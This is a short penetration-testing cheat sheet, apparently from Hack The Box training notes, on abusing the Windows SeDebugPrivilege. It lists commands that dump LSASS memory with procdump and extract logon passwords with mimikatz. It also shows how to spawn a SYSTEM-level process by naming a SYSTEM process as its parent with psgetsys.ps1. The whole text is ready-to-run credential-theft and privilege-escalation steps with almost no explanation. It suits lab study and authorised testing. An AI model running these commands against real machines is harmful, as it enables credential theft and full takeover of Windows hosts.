Abuse of SeDebugPrivilege
C:\htb> procdump.exe -accepteula -ma lsass.exe lsass.dmp
C:\htb> mimikatz.exe
mimikatz # log
mimikatz # sekurlsa::minidump lsass.dmp
mimikatz # sekurlsa::logonpasswordsRemote Code Execution as SYSTEM
# Obtener PID del proceso que se ejecuta como SYSTEM
PS C:\htb> tasklist
PS C:\htb> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent(<SYSTEM-PID>,<COMMAND-A-EJECUTAR>,"")
# or
PS C:\htb> .\psgetsys.ps1; [MyProcess]::CreateProcessFromParent((Get-Process 'lsass').Id,<COMMAND-A-EJECUTAR>,"")Last updated